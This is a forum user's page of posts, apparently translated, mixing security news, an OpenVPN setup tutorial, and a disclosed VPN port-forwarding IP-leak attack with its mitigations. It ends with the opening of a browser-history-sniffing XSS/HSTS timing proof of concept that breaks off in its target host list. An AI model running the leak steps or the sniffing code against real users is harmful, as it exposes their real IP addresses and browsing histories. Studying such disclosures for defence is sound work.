Everything posted by Nytro
-
I'd like to screw your whole Mongol clan.
-
Long list: List of Bug Bounty Programs INTERNATIONAL 426+ OFFICIAL - Bug Bounty Sheet VULNERABILITY LAB
-
Kevin Breen - DarkComet From Defense To Offense - Identify your Attacker

DarkComet is a Remote Access Trojan that has been around for a while. It has been used by script kiddies and nation states alike. It is no longer in active development and it is well documented and understood. So why would you be interested in me talking to you about this bit of malware? Because it has a vulnerability and a public exploit that can tell you a lot about the attacker's campaign. How many machines has he infected, where are the infected hosts, what information has he stolen from these machines? Taking the exploit one step further and adding a little imagination and forensics knowledge, we can start to identify the attacker himself. Identifying the IP and domain is easy and will give you some info. But what if you could get his daily email address, Facebook details, favourite coffee shop, local library, a copy of his CV and, if you are really lucky, a txt file containing all the credentials for his remote exploit sites and FTP dumps? This presentation is not going to look at the deep technical aspects of the exploit; instead it will start with the defensive posture against DarkComet and extract some key information from an attack against you, finishing with a case study showing what information can be extracted from the attacker.

More info: https://techanarchy.net/2015/11/darkcomet-hacking-the-hacker/
-
Researcher Hijacks Android Phone via Chrome Vulnerability
By SecurityWeek News on November 13, 2015

Over the past few months, Google has been busy squashing security vulnerabilities in its popular Android mobile operating system, but many remain undiscovered, and some can be easily exploited. Chinese researcher Guang Gong from Qihoo 360 demonstrated at MobilePwn2Own at the PacSec conference in Tokyo how an Android device running the latest version of the operating system can be hijacked by exploiting a JavaScript v8 vulnerability through the Chrome browser. Granted, the security flaw did not reside in the Android OS itself, but devices running on the platform are vulnerable.

Gong discovered a JavaScript v8 vulnerability in Chrome for Android that allowed him to install an arbitrary application on the affected device, in this case a BMX Bike game, without requiring any user interaction, PacSec organizer Dragos Ruiu explained in a Google+ post. As long as Chrome is used to navigate to a malicious site an attacker set up, the device can be infected. The exploit was demonstrated on a Google Project Fi Nexus 6 running the latest Android 6.0 Marshmallow build and with all applications up to date. The researcher demonstrated that the vulnerability could provide an attacker with complete control of the device, and that successful exploitation does not require chaining multiple vulnerabilities. This one-shot exploit was revealed after three months of work, Ruiu said, but exact details on the security flaw were not publicly disclosed. According to Ruiu, the exploit was tested on other devices as well, and it worked on all of them. Given that the vulnerability is in the JavaScript engine in Chrome, it is believed to affect all Android versions with the latest version of the browser installed. Details on the vulnerability were handed to a Chrome engineer at the conference, Ruiu announced via Twitter.

Unfortunately for Gong, his presentation at the conference did not result in an immediate reward for his efforts, though it is likely that Google will reward him for discovering the vulnerability, as the company has a bug bounty program set up for Chrome and Chrome OS. "Since we don't have any lavish prizes for him, I'm bringing him to Canada next year for some skiing/snowboarding at CanSecWest," Ruiu said, so it seems that a prize will be coming from the PacSec organizers. Google will most likely resolve the vulnerability soon, even if the details on the exploit haven't been made public as of now. Security researchers have discovered a series of critical Android vulnerabilities this year, including the Stagefright flaw that affected close to a billion devices, and a Stagefright 2 issue suspected to affect devices running all Android versions, starting with the initial release.

Source: http://www.securityweek.com/researcher-hijacks-android-phone-chrome-vulnerability
-
Funky File Formats [31c3]

Funky File Formats
Advanced binary tricks
Binary tricks to evade identification, detection, to exploit encryption and hash collisions.
* artistic binaries - why they are possible, how they work.
- quines
- polyglots & chimeras
- schizophrenic
- AngeCryption
- hash collisions
* challenges and failures

Speaker: Ange Albertini
EventID: 5930
Event: 31st Chaos Communication Congress [31c3] of the Chaos Computer Club [CCC]
Location: Congress Centrum Hamburg (CCH); Am Dammtor; Marseiller Straße; 20355 Hamburg; Germany
Language: english
Begin: Mon, 12/29/2014
License: CC-by
-
IP leak affecting VPN providers with port forwarding
Perfect Privacy, 26. November 2015

Vulnerability "Port Fail" reveals real IP address

We have discovered a vulnerability in a number of providers that allows an attacker to expose the real IP address of a victim. "Port Fail" affects VPN providers that offer port forwarding and have no protection against this specific attack. Perfect Privacy users are protected from this attack.

This IP leak affects all users: the victim does not need to use port forwarding, only the attacker has to set it up.

We have tested this with nine prominent VPN providers that offer port forwarding. Five of those were vulnerable to the attack and have been notified in advance so they could fix this issue before publication. However, other VPN providers may be vulnerable to this attack as we could not possibly test all existing VPN providers.

Details about the leak

The attacker needs to meet the following requirements:
- Has an active account at the same VPN provider as the victim
- Knows the victim's VPN exit IP address (can be obtained by various means, e.g. IRC or torrent client or by making the victim visit a website under the attacker's control)
- The attacker sets up port forwarding. It makes no difference whether the victim has port forwarding activated or not.

The IP leak can then be triggered as follows:
1. Victim is connected to VPN server 1.2.3.4
2. Victim's routing table will look something like this:
   0.0.0.0/0 -> 10.0.0.1 (internal vpn gateway ip)
   1.2.3.4/32 -> 192.168.0.1 (old default gateway)
3. Attacker connects to the same server 1.2.3.4 (knows the victim's exit through IRC or other means)
4. Attacker activates Port Forwarding on server 1.2.3.4, example port 12345
5. Attacker gets the victim to visit 1.2.3.4:12345 (for example via embedding <img src="http://1.2.3.4:12345/x.jpg"> on a website)
6. This connection will reveal the victim's real IP to the attacker because of the "1.2.3.4/32 -> 192.168.0.1" vpn route.

The crucial issue here is that a VPN user connecting to his own VPN server will use his default route with his real IP address, as this is required for the VPN connection to work. If another user (the attacker) has port forwarding activated for his account on the same server, he can find out the real IP addresses of any user on the same VPN server by tricking him into visiting a link that redirects the traffic to a port under his control. Also note that due to the nature of this attack all VPN protocols (IPSec, OpenVPN, PPTP, etc.) and all operating systems are affected.

Mitigation

Affected VPN providers should implement one of the following:
- Have multiple IP addresses, allow incoming connections to ip1, exit connections through ip2-ipx, have port forwardings on ip2-ipx
- On client connect, set a server-side firewall rule to block access from the client's real IP to port forwardings that are not his own.

Source: https://www.perfect-privacy.com/blog/2015/11/26/ip-leak-vulnerability-affecting-vpn-providers-with-port-forwarding/
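The route lookup described in the post, together with both proposed mitigations, modelled in Python. This is an added example written for this page, not code from Perfect Privacy. It uses the post's own addresses (1.2.3.4, 10.0.0.1, 192.168.0.1) and constructs the rest (the victim's real address 203.0.113.7, a tunnel address 10.8.0.6, a second server address 1.2.3.5 and two account names), all of which are assumptions. It shows why the /32 host route makes a connection to the VPN server's own address leave with the real source address, why moving port forwards to a second address (mitigation 1) keeps such a connection inside the tunnel, and how a per-client server-side check (mitigation 2) would refuse a connected client's real address on a forward that client does not own.

```python
import ipaddress

# Addresses taken from the post: VPN server 1.2.3.4, tunnel gateway 10.0.0.1,
# old default gateway 192.168.0.1. Everything else is constructed for this example.
VPN_SERVER = "1.2.3.4"
FORWARD_IP = "1.2.3.5"             # constructed: server address carrying only port forwards (mitigation 1)
REAL_IP = "203.0.113.7"            # constructed: victim's real, ISP-assigned address
TUNNEL_IP = "10.8.0.6"             # constructed: victim's address inside the VPN tunnel
OTHER_REAL_IP = "198.51.100.9"     # constructed: real address of the account owning the forward

# Victim's routing table as shown in the post:
# (prefix, gateway, source address a packet sent through that route carries).
VICTIM_ROUTES = [
    ("0.0.0.0/0", "10.0.0.1", TUNNEL_IP),    # default route through the tunnel
    ("1.2.3.4/32", "192.168.0.1", REAL_IP),  # host route so the tunnel itself can reach the server
]


def select_route(routes, dst):
    """Longest-prefix match over (prefix, gateway, source) tuples, the core of a host's route lookup."""
    dst_addr = ipaddress.ip_address(dst)
    best = None
    for prefix, gateway, src in routes:
        net = ipaddress.ip_network(prefix)
        if dst_addr in net and (best is None or net.prefixlen > best[0].prefixlen):
            best = (net, gateway, src)
    return best


def source_seen_at(dst, routes=VICTIM_ROUTES):
    """Source address the host at `dst` sees when the victim connects to it."""
    return select_route(routes, dst)[2]


def forward_allowed(src_ip, port, forwards, connected_clients):
    """Mitigation 2 as a server-side check applied to a packet arriving on a forwarded port.

    forwards: port -> account that owns the forward.
    connected_clients: account -> real address it connected to the VPN from.
    A connected client's real address may only reach forwards that client owns.
    """
    owner = forwards.get(port)
    if owner is None:
        return False  # nothing forwarded on this port
    for account, real_ip in connected_clients.items():
        if real_ip == src_ip and account != owner:
            return False
    return True


if __name__ == "__main__":
    print("source seen at 1.2.3.4 (VPN server itself):", source_seen_at(VPN_SERVER))  # real address
    print("source seen at 1.2.3.5 (forward-only address):", source_seen_at(FORWARD_IP))  # tunnel address
    forwards = {12345: "account-b"}
    clients = {"account-a": REAL_IP, "account-b": OTHER_REAL_IP}
    print("account-a's real IP on account-b's forward allowed:",
          forward_allowed(REAL_IP, 12345, forwards, clients))
```

Mitigation 1 works because the only route that bypasses the tunnel is the /32 for the address the client connected to; a forward on any other server address is reached through the default route and therefore carries the tunnel address. Mitigation 2 needs the server to remember, per connected account, the real address the tunnel was built from, which is exactly what the `connected_clients` mapping models.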
-
dai.s.u.scu.ele@gmail.com "Dai sus cu ele" ("Put them up")?
-
About OpenVPN:

If you're looking for a way to safely and easily access the internet from your smartphone, laptop or any other device on an untrusted network like a hotel's or a restaurant's Wi-Fi, the answer is a virtual private network (VPN), which gives you the ability to roam untrusted networks securely and privately as if you were on a private and secure network. The traffic then comes out and makes its way to the required destination. Combining this setup with HTTPS connections lets you secure your wireless logins and transactions. You can also get past geographical restrictions and censorship and shield your location and your unencrypted HTTP traffic from the untrusted network.

OpenVPN is an open source, fully featured SSL (Secure Socket Layer) VPN solution that supports a vast range of configurations. This article will explain how to set up an OpenVPN server on a Droplet and then access it from a different operating system like Windows, OS X, iOS or Android. The article will keep the installation and configuration process as simple as it can be for these setups.

Prerequisites:
The only thing you need beforehand is an Ubuntu 14.04 Droplet up and running. You will need root access to complete the rest of the article.

Step 1 (Install and Configure the Environment of the OpenVPN Server)
To set up the server side of your OpenVPN you need to complete the following steps.

OpenVPN Configuration
We need to update Ubuntu's repository lists before we install any packages. After doing so we can install Easy-RSA and OpenVPN. The VPN server configuration file must be extracted to /etc/openvpn so that we can add it to our setup. A single command can be used to do this:
gunzip -c /usr/share/doc/openvpn/examples/sample-config-files/server.conf.gz > /etc/openvpn/server.conf
Once this has been extracted we must open server.conf in a text editor. We will edit it using Vim but you can use whichever text editor you want. There are a number of changes to be made. You will see a section like this: Edit dh1024.pem to dh2048.pem. Doing this will double the RSA key length used when generating server and client keys.

Stay inside server.conf and look for this section. Remove the comment from push "redirect-gateway def1 bypass-dhcp". By doing this, the VPN server passes on clients' web traffic to its required destination. The next edit to be done here: remove the comments so that the last two lines of the above section look like this: This will tell the server to push OpenDNS to the connected clients for DNS resolution wherever possible. This will help prevent the leakage of DNS requests outside the VPN connection. It is also necessary to set the desired DNS resolvers on the client devices too. Although OpenDNS is used by default by OpenVPN, you can use whichever DNS services you like.

The last area to edit in server.conf is: Remove the comments from the last two lines of the section above so they look like this: OpenVPN runs as the root user by default and in turn has full access to the system. We will restrict OpenVPN to just the user nobody and group nogroup. This user has no ability to log in and is simply an unprivileged user. This user is also commonly used to run untrusted applications like web-facing servers. Save the changes and close Vim now.

Packet forwarding
This is a sysctl setting that tells the server's kernel to forward traffic from the client devices out to the internet. If this is not done, the traffic will stop at the server. Packet forwarding should be enabled at runtime with this command: This should be made permanent so that the server still forwards traffic after a reboot. At the top of the sysctl file there will be: Uncomment net.ipv4.ip_forward. It should look like: Save the changes you have made and then exit.

Uncomplicated Firewall (ufw)
ufw is a front end for iptables and setting it up is quite easy. It's already present in Ubuntu 14.04 by default, so all we have to do is configure some settings and rules and switch the firewall on. First, set ufw to allow SSH. At the command prompt enter: This article will use OpenVPN over UDP, so ufw must be set to allow UDP traffic over port 1194. Now we have to set ufw's forwarding policy. We'll edit ufw's primary file for this. Look for DEFAULT_FORWARD_POLICY="DROP" and change it to DEFAULT_FORWARD_POLICY="ACCEPT". After doing this we will add some more rules for network address translation and masquerading of connected clients' IPs. Now make the top of the before.rules file look like it does below. The area in red for OPENVPN RULES will be added next: After the changes have been made, we can enable it. Go to the command prompt: Doing so will return this prompt: Answer y. The result will then be: Now we'll check ufw's firewall status: Entering this command should return something like this:

Step 2 – Creating a Certificate Authority and Server-Side Certificate and Key
Certificates are used by OpenVPN to encrypt files.

Configuring and Building the Certificate Authority
Now it's time to generate our own Certificate Authority (CA) and generate certificates and keys for the OpenVPN server. OpenVPN supports bidirectional authentication based on certificates, which means that the client and the server must authenticate each other's certificate before trust is mutually established between them. To do this we will use the Easy RSA scripts that we copied earlier. First we copy the Easy RSA generation scripts. Then the key storage directory should be made: There is a variables file that can be edited to create certificates exclusive to our business, person or whatever entity of our choice.
This information will be copied to the keys and the certificates, later helping to identify keys. The variables that are marked below in red should be changed to what you prefer. In the very same vars file we also need to edit this one single line below. Just for the sake of simplicity we are using server as the key name. If you intend to use a different name then you're going to need to update the OpenVPN configuration files that reference server.key and server.crt. Now we need to generate the Diffie-Hellman parameters, which will take several minutes. Now we'll be changing directories so that we can work directly out of where we moved the Easy RSA scripts to in Step 2. Now we'll be initializing the Public Key Infrastructure. Special attention needs to be paid to the dot (.) and the space in front of the ./vars command. This refers to the current directory where we're working. The output generated by the above command is shown below. Nothing has been generated by us yet in the keys directory, so the warning is nothing to get alarmed about. Now we'll make way for our new keys by clearing out any old or existing keys that may be in the directory: This last command invokes an interactive OpenSSL command and builds the certificate authority (CA). The output will ask you to confirm the variables that were entered before into the Easy RSA variable file. Just press ENTER to pass through every prompt. If you feel like something should be changed then you can do that from within the prompt.

Generate a Certificate and Key for the Server
We're still working from /etc/openvpn/easy-rsa; now enter the command to build the key for the server. The server marked in red is the export KEY_NAME variable that we set in Easy RSA's vars file in Step 2. The same output is generated as when we ran the ./build-ca command; you can press ENTER again to confirm every line of the distinguished name. This time, however, you'll see two additional prompts: Both should be left blank, just press ENTER to skip each one. Two queries at the end require a positive (y) response: Lastly the above prompt should complete with:

Move the Server Certificate and Keys
OpenVPN is set by default to look for the certificate, keys and the server's CA in /etc/openvpn. Now we need to copy the required files into the proper location so that OpenVPN can access them. If your copy was successful, you can verify it by: Now you should see the certificate and key files for the server in the desired location. At this stage, OpenVPN is up and ready to go. You should now start it and check the status. The output that you should see in return would be like this: Congratulations! You have successfully configured your OpenVPN server and it should be operational. If for some reason the status message says that the VPN is not running then you should take a closer look at your /var/log/syslog file for any errors such as: The error mentioned above indicates that server.key was not yet copied into /etc/openvpn correctly. You need to copy the file again to the directory and follow the procedure to try again and bring your OpenVPN to its operational state.

Step 3 – Generate Certificates and Keys for Clients
Up till now we have installed and configured the OpenVPN server. We created a Certificate Authority and created a certificate and keys just for the server. This step shows how we use the server's CA to make certificates and keys for every client device that is going to be connected to the VPN. All of these files will then be installed on the client devices such as smartphones or laptops later on.

Key and Certificate Building
Ideally each client connecting to the VPN should have its own certificate and key. This is preferred over generating a general certificate and key for all the clients that are connected to the VPN. It should be noted that by default OpenVPN does not allow simultaneous connections to the server from clients using the same certificate and key. This step should be completed if you intend to create separate authentication credentials for each device that is to be connected to the VPN. Change the name client1 below to something different like client2 or iphone2. If we give every device its own credentials then it can be individually deactivated on the server side when needed. The rest of the article shall use client1 as the example client device's name. Now we're going to build a key for client1 as we did for the server. The working directory that you should be in is /etc/openvpn/easy-rsa. As with the server, you'll be asked again to confirm or change the distinguished name variables, and just like before these two should be left blank. Press ENTER to accept the default settings. Just like before, these two confirmations will need a (y) response at the end of the build process: If the key build succeeds then the output, just like before, will be: The example client configuration needs to be copied to the Easy-RSA key directory. This example configuration file shall be used as a template that will be downloaded to the client devices and then edited. While copying we'll be changing the name of the example file from client.conf to client.ovpn because .ovpn is the extension that all the clients will expect to use.
cp /usr/share/doc/openvpn/examples/sample-config-files/client.conf /etc/openvpn/easy-rsa/keys/client.ovpn
This section can be repeated for each client by replacing client1 with the right client name.

Transferring Certificates and Keys to Client Devices
Remember from the steps above that we created the keys and certificates, and the directory in which we stored them after they were made was /etc/openvpn/easy-rsa/keys.
For every client we must transfer the client profile template, certificate and key files to a folder on our local computer or another client device. In this article the client1 device requires its keys and certificate that are located on the server in: The ca.crt and client.ovpn for all the clients stay exactly the same. These two files should also be downloaded. It should be noted that the ca.crt file is located in a different directory than the others. The application used to complete this transfer will depend on your choice and on the operating system of the device. You want the application to use SFTP (SSH file transfer protocol) or SCP (Secure copy protocol) on the backend. This is useful as it will copy all of the client's VPN authentication files over an encrypted connection. At the end you must check that the following four files are present on your client device:
client1.crt
client1.key
client.ovpn
ca.crt

Step 4 – Creating a Unified OpenVPN Profile for Client Devices
There are a number of methods that can be used to manage the client files but the easiest one is using a unified profile. This is done by editing the client.ovpn template file and including in it the server's CA and the client's key and certificate. Once all the files are merged into one, only this single client.ovpn needs to be imported into the client's OpenVPN application. We will create a single profile for our client1 device on the computer to which we downloaded all the client files. This computer can itself be either a client or just another temporary work area to merge the authentication files. The client.ovpn template file should be duplicated and renamed. How you do this depends on the operating system of your local computer. It should be noted that the name of the duplicated client.ovpn file need not be related to the client device. The OpenVPN application on the client side will use the file name as an identifier for the VPN connection itself. You should duplicate client.ovpn to whatever name you want the VPN to have in your operating system. In this article we shall name the connection GeekEasier, so GeekEasier.ovpn shall be the file name used from now on. Once it is named we must open GeekEasier.ovpn in a text editor. You can use whichever text editor you prefer. The first area you need to pay attention to is the IP address of your Droplet. Near the top of the file, we need to change my-server-1 to your VPN's IP. After doing this we need to find the area shown below and uncomment user nobody and group nogroup just like we did before in server.conf in Step 1. It should be noted that this does not apply to the Windows operating system, so you can skip it there. It should look like this: The area below needs the three lines shown to be commented out so that we can instead include the key and certificate directly in the GeekEasier.ovpn file. After you're done it should look like this: Now we need to merge all the individual files into one single unified file. The contents of ca.crt, client1.crt, and client1.key are pasted directly into the .ovpn profile using the XML-like syntax. The XML at the end should take this form: Once finished, the end of the file should be the same as this abbreviated example: The client1.crt has a bit of extra information in it and it's totally fine to just add the whole file. Save the changes you have made and exit. We now have a unified OpenVPN client profile to configure our client1 with.

Step 5 – Installing the Client Profile
Now we discuss how to install a client VPN profile on Android, iOS, OS X, and Windows. All of these client instructions are independent of the others so you can skip to whichever one applies to you. Remember that the connection will be called by the same name that you gave the .ovpn file. In our example, since the file name was GeekEasier.ovpn, the connection will be called GeekEasier.

Windows
Installing
The OpenVPN client application for Windows can be downloaded from OpenVPN's Downloads page. You have to choose the right version for your Windows. Note that administrative rights are required to install OpenVPN on Windows. After you have installed OpenVPN, copy the unified GeekEasier.ovpn profile to: When you open OpenVPN it will automatically see the profile and make it available. OpenVPN must be run as an administrator each time it is used, even by administrative accounts. To save the hassle of having to right-click and select Run as administrator every time you use the VPN, you can preset this, but it must be done from an administrator account. This means that standard users need to enter the admin password to use OpenVPN. But if standard users do not have administrative rights then OpenVPN cannot connect to the server properly, so administrative privileges are necessary. To set the OpenVPN application to always run as administrator, right-click on the shortcut icon and go to Properties. At the bottom of the Compatibility tab there will be a button saying Change settings for all users; click on it. A new window will open; check the Run this program as an administrator box.

Connecting
Every time you launch the OpenVPN GUI, Windows will ask whether you want this program to make changes to your computer. Click Yes. Executing the OpenVPN client application just puts the applet in the system tray so that the VPN can be connected and disconnected when needed; it does not make a VPN connection per se.
Now that you have started OpenVPN, make a connection by moving the cursor down to the system tray applet and right-clicking on the OpenVPN applet icon. This will open the context menu. Select GeekEasier from the top of the menu (our GeekEasier.ovpn profile) and Connect.

OS X
Installing
There is an open source VPN client for Mac OS X known as Tunnelblick. To download the latest disk image of this client go to the Tunnelblick Downloads page. After it has been downloaded, double-click on the .dmg file and follow the steps to install. Near the end of the installation process, Tunnelblick will ask whether you have any configuration files. Answering No is easier and then it will finish. We have to add the client profiles, and to do that we open a Finder window and double-click on GeekEasier.ovpn. To install the client profile we need administrative rights.

Connecting
Launch Tunnelblick by double-clicking on Tunnelblick in the Applications folder. Once you have launched Tunnelblick, you will see a Tunnelblick icon in the menu bar at the top right of the screen that is used for controlling connections. Click on the icon; when the Connect menu opens, select the right connection. Select GeekEasier and connect to the VPN.

iOS
Installing
Go to the iTunes App Store, search for and install OpenVPN Connect, the official iOS OpenVPN client application. Now we need to transfer our iOS client profile onto the device, and to do that we must connect the iOS device directly to the computer. Completing the transfer is outlined here. From the computer open iTunes and click iPhone > Apps. At the bottom of the File Sharing section click on the OpenVPN app. The window to the right is blank; it is OpenVPN Documents and is used for sharing files. Now drag the .ovpn file to the OpenVPN Documents window. Now all you have to do is launch the app on the iPhone. You will get a notification that a new profile is ready to be imported. Tap the green plus sign to import it.

Connecting
Now the OpenVPN app is ready to use with the new profile. The connection can be started by sliding the Connect button to the On position. To disconnect, slide the button to Off. It should be noted that the VPN button in Settings cannot be used to connect to the VPN. If you try, you will get a notice to connect using the OpenVPN app.

Android
Installing
For Android all we need to do is open the Google Play Store. Search for Android OpenVPN and install the official Android client application. Copying the .ovpn file is not hard. All we need to do is connect our Android device to the computer and copy the file over to it. Similarly, if you have an SD card reader, you can simply remove the memory card from the device, copy the .ovpn file onto it and put the card back into the device. Now start the OpenVPN application and go to the menu to import the profile. Then go to the location where the profile has been saved. The screenshot uses the SD card location (/sdcard/download/) and from there select the file. The application will note that the profile has been imported.

Connecting
To connect to the VPN just tap the Connect button. The application will ask whether you trust the OpenVPN application. Tap OK to start the connection. To disconnect from the VPN, go back to the OpenVPN application and choose Disconnect.

Step 6 – Testing Your VPN Connection
Once you have installed everything, a simple check can be made to tell whether everything is working properly. Without enabling a VPN connection, open a browser and go to DNSLeakTest. The website will return the IP address that is assigned to you by your ISP (Internet Service Provider), which is also how you appear to the entire world. If you want to check your DNS settings from the same website, click on Extended Test and it will tell you which DNS servers you are using. Now connect the OpenVPN client to the Droplet's VPN and refresh your browser. An IP address should appear that is completely different from the one shown earlier. Now the entire world will recognize you by this IP address. Again, DNSLeakTest's Extended Test will check your DNS settings and confirm whether you are now using the DNS resolvers pushed by your VPN. Congratulations! You can now securely traverse the internet, protecting your identity, location and traffic from censors and snoopers.

Source: http://geekeasier.com/set-up-an-openvpn-server-on-ubuntu/3584/
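The Step 4 merge as a small script: an added example written for this page, not code from the GeekEasier article or from the OpenVPN project. It rewrites the remote line, uncomments user nobody and group nogroup (skipped for Windows), comments out the ca/cert/key file references and appends the inline <ca>, <cert> and <key> blocks. The template and PEM contents embedded here are constructed placeholders standing in for client.ovpn, ca.crt, client1.crt and client1.key, and 203.0.113.10 is a constructed stand-in for the Droplet's address. The one design choice beyond the article is that only the PEM block of client1.crt is kept, dropping the human-readable dump easy-rsa puts in front of it (the article notes that leaving it in also works).

```python
import re

# Constructed stand-in for the client.ovpn template copied in Step 3; only the
# lines the merge touches matter, everything else is kept verbatim.
CLIENT_TEMPLATE = """\
client
dev tun
proto udp
remote my-server-1 1194
resolv-retry infinite
nobind
;user nobody
;group nogroup
persist-key
persist-tun
ca ca.crt
cert client.crt
key client.key
comp-lzo
verb 3
"""

# Constructed placeholders for the files produced in Steps 2 and 3. Real files
# carry base64 bodies; client1.crt also starts with a human-readable dump, as here.
CA_CRT = "-----BEGIN CERTIFICATE-----\nCONSTRUCTED-CA-BODY\n-----END CERTIFICATE-----\n"
CLIENT1_CRT = ("Certificate:\n    Data:\n        Version: 3 (0x2)\n"
               "-----BEGIN CERTIFICATE-----\nCONSTRUCTED-CLIENT1-BODY\n-----END CERTIFICATE-----\n")
CLIENT1_KEY = "-----BEGIN PRIVATE KEY-----\nCONSTRUCTED-KEY-BODY\n-----END PRIVATE KEY-----\n"


def pem_block(text, label_pattern):
    """Return the first PEM block whose label matches label_pattern, without surrounding text."""
    pattern = r"-----BEGIN (?P<label>%s)-----.*?-----END (?P=label)-----" % label_pattern
    match = re.search(pattern, text, re.S)
    if match is None:
        raise ValueError("no PEM block matching %r" % label_pattern)
    return match.group(0)


def build_unified_profile(template, server_ip, ca_crt, client_crt, client_key, windows=False):
    """Turn the client.ovpn template plus the three files into one self-contained profile."""
    lines = []
    for line in template.splitlines():
        fields = line.split()
        if fields and fields[0] == "remote":
            fields[1] = server_ip              # my-server-1 -> the Droplet's address
            line = " ".join(fields)
        elif line in (";user nobody", ";group nogroup") and not windows:
            line = line[1:]                    # uncomment; the article skips this on Windows
        elif fields and fields[0] in ("ca", "cert", "key"):
            line = "#" + line                  # file references are replaced by inline blocks
        lines.append(line)
    lines += [
        "<ca>", pem_block(ca_crt, "CERTIFICATE"), "</ca>",
        "<cert>", pem_block(client_crt, "CERTIFICATE"), "</cert>",
        "<key>", pem_block(client_key, r"(?:RSA |EC )?PRIVATE KEY"), "</key>",
    ]
    return "\n".join(lines) + "\n"


if __name__ == "__main__":
    # 203.0.113.10 is a constructed placeholder for the Droplet's public IP.
    print(build_unified_profile(CLIENT_TEMPLATE, "203.0.113.10", CA_CRT, CLIENT1_CRT, CLIENT1_KEY))
```

Because the profile now embeds the client's private key, it should be moved to the device over SFTP or SCP as the article says and deleted from any intermediate machine once imported; a leaked GeekEasier.ovpn is a leaked client identity until that certificate is revoked on the server.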
-
Thanks. Yes, it's extensive. Such things are not sold, bought or given away for free.
-
Windows Phone Internals 1.0 - the first toolkit for rooting Lumia phones
Aurelian Mihai - 26 Nov 2015

Through the efforts of a very active hacker in the XDA Developers community, users of Lumia phones running Windows Phone will now be able to customize the installed OS version just like Android users do. With Windows Phone Internals 1.0 you can unlock the default bootloader on Lumia phones and apply the Root procedure, gaining access to the innards of the operating system and even the ability to install unofficial Windows Phone ROMs, modifying or extending the device's base functionality.

According to the developer known by the pseudonym Heathcliff, the software already supports "most versions of Windows Phone 8.1 and Windows 10 Mobile". Of course, as with the similar procedure used to modify Android devices, changes made by users can lead to the loss of the manufacturer's warranty if those changes end up breaking the device.

For now, the usefulness of the Windows Phone Internals kit is limited, as there are no custom Windows Phone ROMs available for installation yet. But things will surely change once the members of the XDA community get to experiment with the new software.

Source: Windows Phone Internals 1.0 - primul toolkit pentru root-area telefoanelor Lumia

I like the articles from go4it.
-
Not sure whether this has been posted before: https://crowdshield.com/bug-bounty-list.php
-
Remotely Sniffing Browser History via XSS Using HSTS + CSP

This is a PoC/demo on how to remotely "sniff" a user's browsing history via Cross-Site Scripting (XSS) vulnerabilities using HSTS/CSP timing attacks. All credits for the original exploit go to @bcrypt; it can be downloaded here: https://github.com/diracdeltas/sniffly. The source code below allows for remote exploitation of clients and remote dumping of positive matches back to a specified web browser.

Source code:

/**
 * @fileoverview This file loads a bunch of HSTS domains and times how long it
 * takes for them to be redirected from HTTP to HTTPS. Based on that, it
 * decides whether the domain is a previously-noted HSTS domain or not.
 * @author yan <yan@mit.edu>
 * @license MIT
 * @version 0.2.0
 */

// Timing in milliseconds above which a network request probably occurred.
// TODO: Determine this dynamically from the distribution of response times.
var TIMING_UPPER_THRESHOLD = 5;
// Timing in milliseconds below which a request time is probably a measurement
// fluke.
var TIMING_LOWER_THRESHOLD = -10;
// Timing allowance for a synchronous image load, which we use to confirm
// positive results in Chrome.
var TIMING_CONFIRM_THRESHOLD = 20;
// Use an arbitrary static preloaded HSTS host for timing calibration
var BENCHMARK_HOST = 'http://torproject.org/';
// Initial timing calibration offset. This gets recalculated every other fetch.
var OFFSET = 0;

var visitedElem = document.getElementById('visited');
var notVisitedElem = document.getElementById('not_visited');
var disclaimer = document.getElementById('disclaimer');
var isFirefox = (window.navigator.userAgent.indexOf('Firefox') !== -1);
var visited = []; // list of hosts that are potentially visited

// Edit this based on scraper results.
var hosts = ['http://www.npmjs.com/', 'http://savecrypto.org/', 'http://www.xoom.com/', 'http://atom.io/', 'http://angel.co/', 'http://vine.co/', 'http://www.oculus.com/en-us/', 'http://www.hackerrank.com/', 'http://noscript.net/', 'http://www.sixt.com/', 'http://www.crazydomains.com.au/', 'http://www.yola.com/', 'http://www.mailerlite.com/', 'http://giustizia.it/', 'http://notepad-plus-plus.org/', 'http://www.unfranchise.com.tw', 'http://www.ing-diba.de/', 'http://www.adreactor.com/', 'http://meduza.io/', 'http://www.wealthfront.com/', 'http://mail.live.com/default.aspx', 'http://muabannhanh.com/', 'http://upjers.com/', 'http://www.rabobank.nl/', 'http://www.ing.nl/', 'http://www.kickstarter.com/', 'http://creativemarket.com/', 'http://pinterest.com/', 'http://www.ashampoo.com/en/usd', 'http://www.sofort.com/', 'http://www.xing.com/', 'http://podio.com/', 'http://www.servis24.cz/', 'http://www.galeria-kaufhof.de/', 'http://www.kocpc.com.tw/', 'http://www.commbank.com.au/', 'http://recyclix.com/', 'http://www.usajobs.gov/', 'http://briian.com/', 'http://www.vultr.com/', 'http://about.gitlab.com/', 'http://www.tanga.com', 'http://wanelo.com/', 'http://herokuapp.com/', 'http://unsplash.com/', 'http://ria.com/', 'http://www.missguided.co.uk/', 'http://lever.co/', 'http://venmo.com/', 'http://ello.co/', 'http://www.template.net/', 'http://www.digid.nl/', 'http://qiwi.ru/', 'http://www.instacart.com/', 'http://www.touchofmodern.com/', 'http://roadtrippers.com/', 'http://www.freshdesignweb.com/', 'http://www.fnb.co.za', 'http://www.graphicsprings.com/', 'http://www.patreon.com/', 'http://hotwords.com/', 'http://www.cryptsy.com/', 'http://vitalsource.com/', 'http://pass.yandex.ua/', 'http://www.yammer.com/', 'http://ixquick.com/', 'http://sbis.ru/', 'http://www.ecosia.org/', 'http://www.freecycle.org/', 'http://pass.yandex.by/', 'http://www.mailjet.com/', 'http://www.yugster.com/', 'http://tinypng.com/', 'http://nest.com/', 'http://kat.cr/', 'http://www.practo.com/', 
